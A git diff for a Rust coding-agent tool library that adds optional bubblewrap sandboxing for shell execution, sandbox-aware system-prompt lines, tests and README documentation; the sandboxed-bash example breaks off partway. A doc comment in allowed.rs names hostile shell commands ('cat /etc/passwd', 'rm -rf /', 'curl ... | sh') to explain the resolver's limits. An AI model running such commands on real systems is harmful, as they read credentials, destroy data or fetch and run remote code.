+19,10 @@ use crate::tool_metadata::{bash, edit, glob, grep, read, webfetch}; pub(super) fn render_tool(prompt: ToolPrompt, output: &mut String, facts: ToolPromptFacts) { match prompt { ToolPrompt::Static(text) => output.push_str(text), - ToolPrompt::Bash => write_bash_section(output), + ToolPrompt::Bash { + network_disabled, + sandboxed, + } => write_bash_section(output, network_disabled, sandboxed), ToolPrompt::Read { path_mode: _, line_numbers, @@ -38,17 +41,23 @@ pub(super) fn render_tool(prompt: ToolPrompt, output: &mut String, facts: ToolPr } } -fn write_bash_section(output: &mut String) { +fn write_bash_section(output: &mut String, network_disabled: bool, sandboxed: bool) { push_block( output, formatcp!( "- Use it for terminal work (git, package managers, test runners, docker) and shell-native search/filter jobs the specialized tools do not handle well.\n\ - - Output includes stdout, stderr under `[stderr]`, and non-zero exit codes as `[exit code: N]`.\n\ - - For independent commands, make parallel `{}` calls. For dependent commands, use one call with `&&`.\n\ - - Quote paths that contain spaces.\n", + - Output includes stdout, stderr under `[stderr]`, and non-zero exit codes as `[exit code: N]`.\n\ + - For independent commands, make parallel `{}` calls. For dependent commands, use one call with `&&`.\n\ + - Quote paths that contain spaces.\n", bash::NAME, ), ); + if sandboxed { + push_line(output, "- Commands run inside a Linux sandbox."); + } + if network_disabled { + push_line(output, "- Network access is disabled in this sandbox."); + } } fn write_read_section(output: &mut String, facts: ToolPromptFacts, line_numbers: bool) { diff --git a/src/llm-coding-tools-core/src/lib.rs b/src/llm-coding-tools-core/src/lib.rs index f87c8fea..1cd0689f 100644 --- a/src/llm-coding-tools-core/src/lib.rs +++ b/src/llm-coding-tools-core/src/lib.rs @@ -31,11 +31,16 @@ pub use system_prompt::SystemPromptBuilder; // Re-export tools (always available, sync or async based on runtime feature) pub use tools::{ - edit_file, execute_command, glob_files, grep_search, read_file, read_todos, write_file, - write_todos, BashOutput, EditError, GlobOutput, GrepFileMatches, GrepLineMatch, GrepOutput, - TaskInput, TaskOutput, TaskSettings, Todo, TodoPriority, TodoState, TodoStatus, + edit_file, execute_command, execute_command_with_mode, glob_files, grep_search, read_file, + read_todos, write_file, write_todos, BashExecutionMode, BashOutput, EditError, GlobOutput, + GrepFileMatches, GrepLineMatch, GrepOutput, TaskInput, TaskOutput, TaskSettings, Todo, + TodoPriority, TodoState, TodoStatus, }; +// Re-export Linux sandbox types (Linux-only, requires linux-bubblewrap feature) +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use tools::linux_bwrap_profile; + // Re-export webfetch tools (requires tokio or blocking feature) #[cfg(any(feature = "tokio", feature = "blocking"))] pub use tools::{fetch_url, format_json, html_to_markdown, WebFetchOutput}; diff --git a/src/llm-coding-tools-core/src/path/allowed.rs b/src/llm-coding-tools-core/src/path/allowed.rs index 8e9b828e..ae2774b9 100644 --- a/src/llm-coding-tools-core/src/path/allowed.rs +++ b/src/llm-coding-tools-core/src/path/allowed.rs @@ -25,11 +25,8 @@ use std::sync::Arc; /// (e.g., `cat /etc/passwd`, `rm -rf /`, `curl ... | sh`). /// /// This resolver only restricts the structured file operations (`read`, `write`, `edit`, -/// `glob`, `grep`). If your threat model requires actual filesystem sandboxing, you must -/// either: -/// -/// - Disable the bash tool entirely, or -/// - Run the process in an OS-level sandbox (containers, seccomp, landlock, etc.) +/// `glob`, `grep`). It does not make shell execution safe. +/// See `SANDBOX-PROFILES.md` for details on sandboxing on Linux. #[derive(Debug, Clone)] pub struct AllowedPathResolver { /// Canonicalized allowed base directories. diff --git a/src/llm-coding-tools-core/src/system_prompt.rs b/src/llm-coding-tools-core/src/system_prompt.rs index 5e389185..53be8187 100644 --- a/src/llm-coding-tools-core/src/system_prompt.rs +++ b/src/llm-coding-tools-core/src/system_prompt.rs @@ -465,7 +465,14 @@ mod tests { built_in_path_tool!(BuiltInEditTool, edit::NAME, Edit); built_in_path_tool!(BuiltInGlobTool, glob::NAME, Glob); built_in_path_tool_with_line_numbers!(BuiltInGrepTool, grep::NAME, Grep); - built_in_tool!(BuiltInBashTool, bash::NAME, ToolPrompt::Bash); + built_in_tool!( + BuiltInBashTool, + bash::NAME, + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false + } + ); built_in_tool!(BuiltInTaskTool, task::NAME, ToolPrompt::Task); fn assert_no_triple_newlines(preamble: &str) { @@ -1187,4 +1194,51 @@ mod tests { assert!(!preamble.contains("`glob` on one or a few files is enough")); assert!(!preamble.contains("`grep` on one or a few files is enough")); } + + #[test] + fn bash_section_conditional_lines() { + struct SandboxedBashTool; + + impl ToolContext for SandboxedBashTool { + const NAME: &'static str = bash::NAME; + fn context(&self) -> ToolPrompt { + ToolPrompt::Bash { + network_disabled: true, + sandboxed: true, + } + } + } + + struct HostBashTool; + + impl ToolContext for HostBashTool { + const NAME: &'static str = bash::NAME; + fn context(&self) -> ToolPrompt { + ToolPrompt::Bash { + network_disabled: false, + sandboxed: false, + } + } + } + + let mut pb = SystemPromptBuilder::new().working_directory("/home/user/project"); + let _ = pb.track(SandboxedBashTool); + let sandboxed = pb.build(); + + let mut pb = SystemPromptBuilder::new().working_directory("/home/user/project"); + let _ = pb.track(HostBashTool); + let host = pb.build(); + + // Sandboxed: both conditional lines present, network line exactly once. + let network_lines: Vec<_> = sandboxed + .lines() + .filter(|l| l.contains("Network access is disabled in this sandbox.")) + .collect(); + assert_eq!(network_lines.len(), 1); + assert!(sandboxed.contains("Commands run inside a Linux sandbox.")); + + // Host: neither conditional line present. + assert!(!host.contains("Network access is disabled")); + assert!(!host.contains("Commands run inside a Linux sandbox")); + } } diff --git a/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs b/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs index e09bcc06..8c9e16d4 100644 --- a/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs +++ b/src/llm-coding-tools-core/src/tools/bash/blocking_impl.rs @@ -1,10 +1,12 @@ //! Blocking shell command execution. use super::{ - timeout_error_with_kill_failure, timeout_message_with_buffered_output, BashOutput, - PIPE_BUFFER_CAPACITY, + timeout_error_with_kill_failure, timeout_message_with_buffered_output, validate_workdir, + BashExecutionMode, BashOutput, PIPE_BUFFER_CAPACITY, }; use crate::error::{ToolError, ToolResult}; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::wrap::blocking as linux_bwrap_wrap; use process_wrap::std::*; use std::io::Read; use std::path::Path; @@ -28,49 +30,45 @@ pub fn execute_command( workdir: Option<&Path>, timeout: Duration, ) -> ToolResult { - if let Some(dir) = workdir { - if !dir.is_absolute() { - return Err(ToolError::InvalidPath(format!( - "working directory must be an absolute path: {}", - dir.display() - ))); - } - if !dir.is_dir() { - return Err(ToolError::InvalidPath(format!( - "working directory does not exist: {}", - dir.display() - ))); - } - } - - #[cfg(windows)] - let mut wrap = CommandWrap::with_new("cmd", |cmd| { - cmd.args(["/C", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); - } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); + execute_command_with_mode(&BashExecutionMode::Host, command, workdir, timeout) +} - #[cfg(not(windows))] - let mut wrap = CommandWrap::with_new("bash", |cmd| { - cmd.args(["-c", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); +/// Executes a shell command with explicit mode selection. +/// +/// # Arguments +/// - `mode` - The execution mode (host or Linux sandbox). +/// - `command` - The shell command to execute. +/// - `workdir` - Optional working directory (must be absolute if provided). +/// - `timeout` - Maximum time to wait for command completion. +/// +/// # Errors +/// - Returns [`ToolError::InvalidPath`] if workdir is not absolute or doesn't exist. +/// - Returns [`ToolError::Execution`] for sandbox mode when bwrap is missing or unusable. +/// - Returns [`ToolError::Timeout`] or [`ToolError::TimeoutWithKillFailure`] on timeout. +pub fn execute_command_with_mode( + mode: &BashExecutionMode, + command: &str, + workdir: Option<&Path>, + timeout: Duration, +) -> ToolResult { + let wrap = match mode { + BashExecutionMode::Host => build_host_wrap(command, workdir), + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + BashExecutionMode::LinuxBwrap(config) => { + linux_bwrap_wrap::build_command_wrap(config, command, workdir) + .map_err(super::map_linux_bwrap_error) } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); - - // Add platform-specific process tree management - #[cfg(windows)] - wrap.wrap(JobObject); - #[cfg(unix)] - wrap.wrap(ProcessGroup::leader()); + }?; + run_wrapped_command(wrap, timeout) +} +/// Runs a wrapped command with timeout, concurrent pipe draining, and proper cleanup. +/// +/// This is the shared implementation for both host and sandbox execution in blocking mode. +pub(in crate::tools::bash) fn run_wrapped_command( + mut wrap: CommandWrap, + timeout: Duration, +) -> ToolResult { let mut child = wrap .spawn() .map_err(|e| ToolError::Execution(e.to_string()))?; @@ -139,6 +137,39 @@ pub fn execute_command( } } +fn build_host_wrap(command: &str, workdir: Option<&Path>) -> ToolResult { + validate_workdir(workdir)?; + + #[cfg(windows)] + let mut wrap = CommandWrap::with_new("cmd", |cmd| { + cmd.args(["/C", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(not(windows))] + let mut wrap = CommandWrap::with_new("bash", |cmd| { + cmd.args(["-c", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(windows)] + wrap.wrap(JobObject); + #[cfg(unix)] + wrap.wrap(ProcessGroup::leader()); + + Ok(wrap) +} + #[cfg(test)] mod tests { use super::*; diff --git a/src/llm-coding-tools-core/src/tools/bash/mod.rs b/src/llm-coding-tools-core/src/tools/bash/mod.rs index 1ec3a033..b6626a97 100644 --- a/src/llm-coding-tools-core/src/tools/bash/mod.rs +++ b/src/llm-coding-tools-core/src/tools/bash/mod.rs @@ -1,10 +1,65 @@ -//! Shell command execution operation. - -use crate::error::ToolError; +//! Run shell commands on the host or inside a Linux bubblewrap sandbox. +//! +//! # Public API +//! - [`execute_command`] / [`execute_command_with_mode`] - Run a shell command with host or sandbox mode. +//! - [`BashExecutionMode`] - Select `Host` or `LinuxBwrap` execution. +//! - [`BashOutput`] - Captured stdout, stderr, and exit code. +//! +//! # Linux Sandbox +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "Enable the `linux-bubblewrap` feature on Linux to wrap commands in a bubblewrap sandbox." +)] +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "Build a profile with `linux_bwrap_profile::Builder`:" +)] +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "- `Builder::public_bot` for untrusted input (no network, filtered mounts, cleared env)." +)] +#![cfg_attr( + all(feature = "linux-bubblewrap", target_os = "linux"), + doc = "- `Builder::trusted_maintenance` for trusted jobs (network enabled, read-only host rootfs)." +)] +//! +//! See +//! for the full operator guide. +//! +//! # Errors +//! - [`ToolError::InvalidPath`] when the working directory is not absolute or does not exist. +//! - [`ToolError::Execution`] when the process cannot start, or when `bwrap` is missing or unusable in sandbox mode. +//! - [`ToolError::Timeout`] / [`ToolError::TimeoutWithKillFailure`] when the command exceeds the deadline. + +use crate::error::{ToolError, ToolResult}; use crate::ToolOutput; use core::fmt::Write; use serde::Serialize; +use std::path::Path; use std::time::Duration; +#[cfg(feature = "tokio")] +mod tokio_impl; +#[cfg(feature = "tokio")] +pub use tokio_impl::{execute_command, execute_command_with_mode}; + +#[cfg(all(feature = "blocking", not(feature = "tokio")))] +mod blocking_impl; +#[cfg(all(feature = "blocking", not(feature = "tokio")))] +pub use blocking_impl::{execute_command, execute_command_with_mode}; + +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use llm_coding_tools_bubblewrap::profile as linux_bwrap_profile; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::profile::Profile; + +/// Execution mode for bash commands. +#[derive(Debug, Clone, PartialEq, Eq, Default)] +pub enum BashExecutionMode { + #[default] + Host, + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + LinuxBwrap(std::sync::Arc), +} /// Default buffer capacity for stdout/stderr pipe reads. /// 32KB covers typical command output without reallocations. @@ -49,6 +104,27 @@ fn timeout_error_with_kill_failure(message: String, kill_error: Option) } } +#[inline] +fn validate_workdir(workdir: Option<&Path>) -> ToolResult<()> { + if let Some(dir) = workdir { + if !dir.is_absolute() { + return Err(ToolError::InvalidPath(format!( + "working directory must be an absolute path: {}", + dir.display() + ))); + } + if !dir.is_dir() { + let msg = if dir.exists() { + format!("working directory is not a directory: {}", dir.display()) + } else { + format!("working directory does not exist: {}", dir.display()) + }; + return Err(ToolError::InvalidPath(msg)); + } + } + Ok(()) +} + /// Result of shell command execution. #[derive(Debug, Clone, Serialize)] pub struct BashOutput { @@ -97,12 +173,30 @@ impl BashOutput { } } -#[cfg(feature = "tokio")] -mod tokio_impl; -#[cfg(feature = "tokio")] -pub use tokio_impl::execute_command; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +#[inline] +fn map_linux_bwrap_error(error: llm_coding_tools_bubblewrap::LinuxBwrapError) -> ToolError { + use llm_coding_tools_bubblewrap::LinuxBwrapError; + match error { + LinuxBwrapError::InvalidPath(message) => ToolError::InvalidPath(message), + LinuxBwrapError::Execution(message) => ToolError::Execution(message), + } +} -#[cfg(all(feature = "blocking", not(feature = "tokio")))] -mod blocking_impl; -#[cfg(all(feature = "blocking", not(feature = "tokio")))] -pub use blocking_impl::execute_command; +#[cfg(all(test, feature = "linux-bubblewrap", target_os = "linux"))] +mod tests { + use super::*; + + #[test] + fn bwrap_error_mapping_preserves_variants() { + let mapped = map_linux_bwrap_error( + llm_coding_tools_bubblewrap::LinuxBwrapError::Execution("bwrap missing".to_string()), + ); + assert!(matches!(mapped, ToolError::Execution(m) if m.contains("bwrap"))); + + let mapped = map_linux_bwrap_error( + llm_coding_tools_bubblewrap::LinuxBwrapError::InvalidPath("bad path".to_string()), + ); + assert!(matches!(mapped, ToolError::InvalidPath(m) if m.contains("bad"))); + } +} diff --git a/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs b/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs index 4b60b954..df9b4713 100644 --- a/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs +++ b/src/llm-coding-tools-core/src/tools/bash/tokio_impl.rs @@ -1,10 +1,12 @@ //! Tokio-based async shell command execution. use super::{ - timeout_error_with_kill_failure, timeout_message_with_buffered_output, BashOutput, - PIPE_BUFFER_CAPACITY, + timeout_error_with_kill_failure, timeout_message_with_buffered_output, validate_workdir, + BashExecutionMode, BashOutput, PIPE_BUFFER_CAPACITY, }; use crate::error::{ToolError, ToolResult}; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +use llm_coding_tools_bubblewrap::wrap::tokio as linux_bwrap_wrap; use parking_lot::Mutex; use process_wrap::tokio::*; use std::path::Path; @@ -91,49 +93,45 @@ pub async fn execute_command( workdir: Option<&Path>, timeout: Duration, ) -> ToolResult { - if let Some(dir) = workdir { - if !dir.is_absolute() { - return Err(ToolError::InvalidPath(format!( - "working directory must be an absolute path: {}", - dir.display() - ))); - } - if !dir.is_dir() { - return Err(ToolError::InvalidPath(format!( - "working directory does not exist: {}", - dir.display() - ))); - } - } - - #[cfg(windows)] - let mut wrap = CommandWrap::with_new("cmd", |cmd| { - cmd.args(["/C", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); - } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); + execute_command_with_mode(&BashExecutionMode::Host, command, workdir, timeout).await +} - #[cfg(not(windows))] - let mut wrap = CommandWrap::with_new("bash", |cmd| { - cmd.args(["-c", command]); - if let Some(dir) = workdir { - cmd.current_dir(dir); +/// Executes a shell command with explicit mode selection. +/// +/// # Arguments +/// - `mode` - The execution mode (host or Linux sandbox). +/// - `command` - The shell command to execute. +/// - `workdir` - Optional working directory (must be absolute if provided). +/// - `timeout` - Maximum time to wait for command completion. +/// +/// # Errors +/// - Returns [`ToolError::InvalidPath`] if workdir is not absolute or doesn't exist. +/// - Returns [`ToolError::Execution`] for sandbox mode when bwrap is missing or unusable. +/// - Returns [`ToolError::Timeout`] or [`ToolError::TimeoutWithKillFailure`] on timeout. +pub async fn execute_command_with_mode( + mode: &BashExecutionMode, + command: &str, + workdir: Option<&Path>, + timeout: Duration, +) -> ToolResult { + let wrap = match mode { + BashExecutionMode::Host => build_host_wrap(command, workdir), + #[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] + BashExecutionMode::LinuxBwrap(config) => { + linux_bwrap_wrap::build_command_wrap(config, command, workdir) + .map_err(super::map_linux_bwrap_error) } - cmd.stdin(Stdio::null()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()); - }); - - // Add platform-specific process tree management - #[cfg(windows)] - wrap.wrap(JobObject); - #[cfg(unix)] - wrap.wrap(ProcessGroup::leader()); + }?; + run_wrapped_command(wrap, timeout).await +} +/// Runs a wrapped command with timeout, concurrent pipe draining, and proper cleanup. +/// +/// This is the shared implementation for both host and sandbox execution on tokio. +pub(in crate::tools::bash) async fn run_wrapped_command( + mut wrap: CommandWrap, + timeout: Duration, +) -> ToolResult { let mut child: Box = wrap .spawn() .map_err(|e| ToolError::Execution(e.to_string()))?; @@ -189,6 +187,39 @@ pub async fn execute_command( } } +fn build_host_wrap(command: &str, workdir: Option<&Path>) -> ToolResult { + validate_workdir(workdir)?; + + #[cfg(windows)] + let mut wrap = CommandWrap::with_new("cmd", |cmd| { + cmd.args(["/C", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(not(windows))] + let mut wrap = CommandWrap::with_new("bash", |cmd| { + cmd.args(["-c", command]); + if let Some(dir) = workdir { + cmd.current_dir(dir); + } + cmd.stdin(Stdio::null()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()); + }); + + #[cfg(windows)] + wrap.wrap(JobObject); + #[cfg(unix)] + wrap.wrap(ProcessGroup::leader()); + + Ok(wrap) +} + #[cfg(test)] mod tests { use super::*; diff --git a/src/llm-coding-tools-core/src/tools/mod.rs b/src/llm-coding-tools-core/src/tools/mod.rs index 3b4d1bbe..02f8c588 100644 --- a/src/llm-coding-tools-core/src/tools/mod.rs +++ b/src/llm-coding-tools-core/src/tools/mod.rs @@ -14,7 +14,9 @@ pub mod task; pub mod todo; pub mod write; -pub use bash::{execute_command, BashOutput}; +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +pub use bash::linux_bwrap_profile; +pub use bash::{execute_command, execute_command_with_mode, BashExecutionMode, BashOutput}; pub use edit::{edit_file, EditError}; pub use glob::{glob_files, GlobOutput}; pub use grep::{grep_search, GrepFileMatches, GrepLineMatch, GrepOutput, DEFAULT_MAX_LINE_LENGTH}; diff --git a/src/llm-coding-tools-serdesai/Cargo.toml b/src/llm-coding-tools-serdesai/Cargo.toml index 363fc04d..c40764c6 100644 --- a/src/llm-coding-tools-serdesai/Cargo.toml +++ b/src/llm-coding-tools-serdesai/Cargo.toml @@ -43,6 +43,11 @@ huggingface = ["serdes-ai-models/huggingface"] mistral = ["serdes-ai-models/mistral"] ollama = ["serdes-ai-models/ollama"] openrouter = ["serdes-ai-models/openrouter"] +# Sandbox feature - enables bubblewrap sandboxing +linux-bubblewrap = [ + "dep:llm-coding-tools-bubblewrap", + "llm-coding-tools-core/linux-bubblewrap", +] [dependencies] # Core tool operations (file read/write/edit, glob, grep, bash, etc.) @@ -50,6 +55,10 @@ llm-coding-tools-core = { version = "0.2.0", path = "../llm-coding-tools-core", "tokio", ] } +# Linux sandboxing via bubblewrap. +# Provides sandbox profiles, presets, and sandbox availability detection. +llm-coding-tools-bubblewrap = { version = "0.1.0", path = "../llm-coding-tools-bubblewrap", optional = true } + # Generic agent runtime dependencies llm-coding-tools-agents = { version = "0.1.0", path = "../llm-coding-tools-agents" } @@ -76,6 +85,7 @@ reqwest = { version = "0.13", default-features = false, features = [ ] } [dev-dependencies] +serial_test = "3" tokio = { version = "1", features = ["macros", "rt-multi-thread"] } tempfile = "3" wiremock = "0.6" diff --git a/src/llm-coding-tools-serdesai/README.md b/src/llm-coding-tools-serdesai/README.md index 505f9338..8a2a126d 100644 --- a/src/llm-coding-tools-serdesai/README.md +++ b/src/llm-coding-tools-serdesai/README.md @@ -2,18 +2,7 @@ [![Crates.io](https://img.shields.io/crates/v/llm-coding-tools-serdesai.svg)](https://crates.io/crates/llm-coding-tools-serdesai) [![Docs.rs](https://docs.rs/llm-coding-tools-serdesai/badge.svg)](https://docs.rs/llm-coding-tools-serdesai) -Lightweight, high-performance serdesAI framework Tool implementations for coding tools. - -## Features - -- **File operations** - Read, write, edit, glob, grep with two access modes: - - `absolute::*` - Unrestricted filesystem access - - `allowed::*` - Sandboxed to configured directories -- **Shell execution** - Cross-platform command execution with timeout -- **Web fetching** - URL content retrieval with format conversion -- **Todo management** - Shared-state todo list tracking -- **Context strings** - LLM guidance text for tool usage (re-exported from core) -- **Schema builders** - Composable helpers for custom tool definitions +Lightweight, high-performance serdesAI implementation for [llm-coding-tools]. ## Installation @@ -29,9 +18,9 @@ llm-coding-tools-serdesai = "0.2" Minimal runnable agent (requires `OPENAI_API_KEY`): ```rust,no_run -use llm_coding_tools_serdesai::absolute::{GlobTool, GrepTool, ReadTool}; +use llm_coding_tools_serdesai::absolute::{EditTool, GlobTool, GrepTool, ReadTool}; use llm_coding_tools_serdesai::agent_ext::AgentBuilderExt; -use llm_coding_tools_serdesai::{BashTool, SystemPromptBuilder, create_todo_tools}; +use llm_coding_tools_serdesai::{BashTool, SystemPromptBuilder, WebFetchTool, create_todo_tools}; use serdes_ai::prelude::*; #[tokio::main] @@ -44,7 +33,9 @@ async fn main() -> std::result::Result<(), Box> { .tool(pb.track(ReadTool::::new())) .tool(pb.track(GlobTool::new())) .tool(pb.track(GrepTool::::new())) - .tool(pb.track(BashTool::new())) + .tool(pb.track(EditTool::new())) + .tool(pb.track(BashTool::host())) + .tool(pb.track(WebFetchTool::new())) .tool(pb.track(todo_read)) .tool(pb.track(todo_write)) .system_prompt(pb.build()) // Last, after tracking all tools @@ -70,8 +61,8 @@ File tools come in two variants with identical APIs: - **`allowed::*`** - Sandboxed to configured directories via `AllowedPathResolver` ```rust,no_run -use llm_coding_tools_serdesai::absolute::{ReadTool, WriteTool}; -use llm_coding_tools_serdesai::allowed::{ReadTool as AllowedReadTool, WriteTool as AllowedWriteTool}; +use llm_coding_tools_serdesai::absolute::{EditTool, ReadTool, WriteTool}; +use llm_coding_tools_serdesai::allowed::{EditTool as AllowedEditTool, ReadTool as AllowedReadTool, WriteTool as AllowedWriteTool}; use llm_coding_tools_serdesai::AllowedPathResolver; use std::path::PathBuf; @@ -82,13 +73,34 @@ let read = ReadTool::::new(); let allowed_paths = vec![PathBuf::from("/home/user/project"), PathBuf::from("/tmp")]; let resolver = AllowedPathResolver::new(allowed_paths).unwrap(); let sandboxed_read: AllowedReadTool = AllowedReadTool::new(resolver.clone()); +let sandboxed_edit = AllowedEditTool::new(resolver.clone()); let sandboxed_write = AllowedWriteTool::new(resolver); ``` -Other tools: `BashTool`, `WebFetchTool`, `TodoReadTool`, `TodoWriteTool`. - Use `SystemPromptBuilder` to track tools and generate context-aware prompts. Context strings are re-exported in `llm_coding_tools_serdesai::context` (e.g., `BASH`, `READ_ABSOLUTE`). +## Linux shell sandboxing + +Enable the `linux-bubblewrap` feature flag to use Linux `bwrap` sandbox profiles: + +```toml +[dependencies] +llm-coding-tools-serdesai = { version = "0.2", features = ["linux-bubblewrap"] } +``` + +Out of the box, 2 profiles are available: + +- **Public Bot**: Assumes anyone can call; and thus defaults to the strictest containment. + - No full host filesystem access, synthetic home, memory-backed `/tmp`, network disabled, sanitized system `PATH`. +- **Trusted Maintenance**: Assumes work in a more trusted environment, e.g. maintaining codebases. + - Read-only host `/` with writable overlays, disk-backed `/tmp`, sanitized host `PATH`, network enabled. + +We default to **Public Bot** profile when sandboxing is used. +In either case, trusted or not, please evaluate whether the solution fits your +security needs. I can make no guarantees. + +More info in [SANDBOX-PROFILES.md](https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md). + ## Agent Runtime For OpenCode-style agent support, use `AgentRuntimeExt` to build agents from an [`AgentRuntime`](https://docs.rs/llm-coding-tools-agents/latest/llm_coding_tools_agents/struct.AgentRuntime.html): @@ -164,6 +176,9 @@ cargo run --example serdesai-basic -p llm-coding-tools-serdesai # Sandboxed file access with allowed::* tools cargo run --example serdesai-sandboxed -p llm-coding-tools-serdesai +# Execution with Sandboxed `bash` +cargo run --example serdesai-sandboxed-bash --features linux-bubblewrap -p llm-coding-tools-serdesai + # Markdown agent runtime (no delegation) cargo run --example serdesai-agents -p llm-coding-tools-serdesai @@ -174,3 +189,5 @@ cargo run --example serdesai-task -p llm-coding-tools-serdesai ## License Apache 2.0 + +[llm-coding-tools]: https://github.com/Sewer56/llm-coding-tools diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs b/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs index 9aec9d9e..8809bd49 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-agents.rs @@ -16,7 +16,7 @@ use llm_coding_tools_serdesai::{AgentDefaults, AgentRuntimeExt}; use std::path::PathBuf; const AGENT_NAME: &str = "basic/file-reader"; -const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7"; +const MODEL_ID: &str = "synthetic/hf:zai-org/GLM-4.7-Flash"; const API_KEY_NAME: &str = "SYNTHETIC_API_KEY"; const API_KEY_VALUE: &str = ""; // <-- Set your API key here diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs b/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs index 650f94ae..972299b6 100644 --- a/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs +++ b/src/llm-coding-tools-serdesai/examples/serdesai-basic.rs @@ -7,6 +7,9 @@ //! - Running the agent with tools //! //! Run: cargo run --example serdesai-basic -p llm-coding-tools-serdesai +//! +//! Please note; Sandboxing is not enabled here, the agents are not restricted. +//! See `serdesai-sandbox` example for a more 'sandboxed' approach. use futures::StreamExt; use llm_coding_tools_serdesai::absolute::{GlobTool, GrepTool, ReadTool}; @@ -19,7 +22,7 @@ use std::fmt::Write; // Set your OpenAI API key here or via OPENAI_API_KEY environment variable. /// Fallback API key if env var is not set. Leave empty to require env var. const OPENAI_API_KEY: &str = ""; -const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7"; +const OPENAI_MODEL: &str = "hf:zai-org/GLM-4.7-Flash"; const OPENAI_BASE_URL: &str = "https://api.synthetic.new/openai/v1"; fn get_openai_api_key() -> String { @@ -45,7 +48,7 @@ async fn main() -> std::result::Result<(), Box> { .tool(pb.track(GlobTool::new())) .tool(pb.track(GrepTool::::new())) // Shell execution - .tool(pb.track(BashTool::new())) + .tool(pb.track(BashTool::host())) // Web content fetching .tool(pb.track(WebFetchTool::new())) // Todo tools with shared state diff --git a/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed-bash.rs b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed-bash.rs new file mode 100644 index 00000000..8644ae5a --- /dev/null +++ b/src/llm-coding-tools-serdesai/examples/serdesai-sandboxed-bash.rs @@ -0,0 +1,136 @@ +//! Example with Sandboxed 'bash' tool using `bwrap` on Linux. +//! +//! Demonstrates explicit sandboxed shell execution with [`BashTool`] and a +//! `public_bot` bubblewrap profile, including one non-shell binary lookup. +//! +//! This example creates a `TempDir`-owned sandbox root with `home`, `cache`, +//! and `host-tmp` subdirectories. It bind-mounts `host-tmp` into sandbox +//! `/tmp`, and the whole tree is cleaned up when the `TempDir` drops at +//! process exit. +//! +//! Run: +//! `SYNTHETIC_API_KEY=... cargo run --example serdesai-sandboxed-bash --features linux-bubblewrap -p llm-coding-tools-serdesai` + +#[cfg(not(all(feature = "linux-bubblewrap", target_os = "linux")))] +fn main() -> Result<(), Box> { + eprintln!("This example requires Linux and the `linux-bubblewrap` feature."); + eprintln!( + "Run: SYNTHETIC_API_KEY=... cargo run --example serdesai-sandboxed-bash --features linux-bubblewrap -p llm-coding-tools-serdesai" + ); + Ok(()) +} + +#[cfg(all(feature = "linux-bubblewrap", target_os = "linux"))] +#[tokio::main] +async fn main() -> Result<(), Box> { + use futures::StreamExt; + use llm_coding_tools_serdesai::agent_ext::AgentBuilderExt; + use llm_coding_tools_serdesai::{ + BashTool, SystemPromptBuilder, + profile::{Availability, Builder, TmpBacking}, + }; + use serdes_ai::prelude::*; + use serdes_ai_models::OpenAIChatModel; + use std::fmt::Write; + use std::fs; + + const API_KEY_NAME: &str = "SYNTHETIC_API_KEY"; + const API_KEY_VALUE: &str = ""; + const MODEL_ID: &str = "hf:zai-org/GLM-4.7-Flash"; + const BASE_URL: &str = "https://api.synthetic.new/openai/v1"; + + fn get_api_key() -> String { + std::env::var(API_KEY_NAME).unwrap_or_else(|_| API_KEY_VALUE.to_string()) + } + + fn log_xml(request_id: u32, tag: &str, content: &str) { + let mut line = String::with_capacity(content.len() + tag.len() * 2 + 18); + let _ = write!(line, "<{request_id}:{tag}>{content}"); + println!("{line}"); + } + + let api_key = get_api_key(); + if api_key.is_empty() { + eprintln!("Set {API_KEY_NAME} or edit API_KEY_VALUE before running this example."); + return Ok(()); + } + + let 